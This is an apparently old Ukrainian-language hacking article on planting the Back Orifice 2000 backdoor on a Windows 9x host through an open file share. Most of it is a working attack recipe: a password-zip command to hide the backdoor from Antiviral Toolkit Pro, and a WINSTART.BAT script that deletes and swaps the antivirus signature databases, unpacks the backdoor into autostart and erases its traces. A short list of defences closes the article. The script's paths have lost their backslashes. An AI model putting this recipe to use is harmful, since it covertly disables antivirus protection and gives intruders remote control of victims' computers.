Даний метод працює тільки на Windows 9x російських версіях (для англійських версій необхідно підправити каталог автозапуску), а також при інсталяції Antiviral Toolkit Pro в c:program filesantiviral toolkit pro (за замовчуванням). Мета даної статті — показати спосіб злому вашого комп’ютера. Автор не несе ніякої відповідальності за збиток, який може бути наслідком прочитання цього повідомлення.

Розглянемо наступну ситуацію: є хост, який має загальний ресурс З повним доступом, встановленим Antiviral Toolkit Pro. Як покласти на нього virus? Для цього треба заархівувати з паролем (BackdooR) сервер бакдора (будемо використовувати Back Oriffice 2000). Пароль використовується для того, щоб AVP сканер не зміг виявити сервер бакдора:

>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE

Тепер AVP не зможе побачити сигнатури BO2k в ASYSLG.DLL (якщо встановлена опція перевірки архівів).

Потім необхідно забезпечити запуск сервера і знешкодити AVP. Для цього напишемо BAT-файл:

@echo off
attrib -R c:progra~1antivi~1ackdoor.avc >nul
attrib -R c:progra~1antivi~1 rojan.avc >nul
del c:progra~1antivi~1ackdoor.avc >nul
del c:progra~1antivi~1 rojan.avc >nul
copy c:progra~1antivi~1macro.avc c:progra~1antivi~1ackdoor.avc >nul
copy c:progra~1antivi~1mail.avc c:progra~1antivi~1 rojan.avc >nul
c:windowspkunzip.exe -e -sBackdooR c:windowsASYSLG.DLL
C:WindowsГЛАВНО~1ПРОГРА~1АВТОЗА~1 >nul
del c:windowspkunzip.exe >nul
del c:windowsasyslg.dll >nul
del c:winstart.bat >nul
echo on

Розшифровка порядково:

відключення виведення на екран виконуваних команд
зняття атрибута READONLY з файлу virus.avc (база сигнатур для бакдоров)
зняття атрибута READONLY з файлу tojan.avc (база сигнатур для троянів)
видалення файлу virus.avc
видалення файлу tojan.avc
підміна бази (для того, щоб при запуску сканера AVP не лаявся)
підміна бази (відсутність бази)
разархивация бакдора і приміщення його автозавантаження
видалення PKUNZIP
видалення архіву з бакдором
видалення файли запуску

Чому це буде працювати? Тому що при старті Windows якщо в головному каталозі знаходиться файл WINSTART.BAT він запускається на виконання. При цьому користувач не побачить жодного повідомлення. Потім потрібно скопіювати на віддалений комп’ютер наступні файли:

ASYSLG.DLL в директорію c:windows
PKUNZIP.EXE в директорію c:windows
WINSTART.BAT в директорію c:

Отже необхідно буде закачати 86.508 байт.

Всі. Після перезавантаження на комп’ютері з автозавантаження запускається сервер, видалить себе звідти і запише себе в c:windowssystem (сервер повинен бути налаштований на видалення оригінального файлу). В принципі, можна використовувати архіватор CAB, і проводити розпаковування програмою EXTRACT.EXE, яка присутні майже на всіх комп’ютерах, що дозволить зменшити розмір перекачуваних даних, однак даний архіватор не дозволяє архівувати з паролем, що може привести до виявлення сервера бакдора сканером (якщо включена опція перевірки архівів).

Рекомендації щодо захисту від даного виду атаки:

Закрийте всі загальні ресурси! Якщо ви без них жити не можете встановіть на них пароль (не менше 6 символів і не менше 1 спецсимвола).
Поставте собі Firewall. Навіть якщо ця атака пройде успішною, отримати доступ до вашої системи не вдасться — Firewall вас відразу ж попередить про спробу проникнення. Я рекомендую Tiny Personal Firewall.
При виявленні та раптового зникнення якихось файлів відразу перевіряйте свої диски антивірусом, а також проводите профілактичну сканування дисків не менше одного разу на тиждень.
Своєчасно оновлюйте антивірусні бази.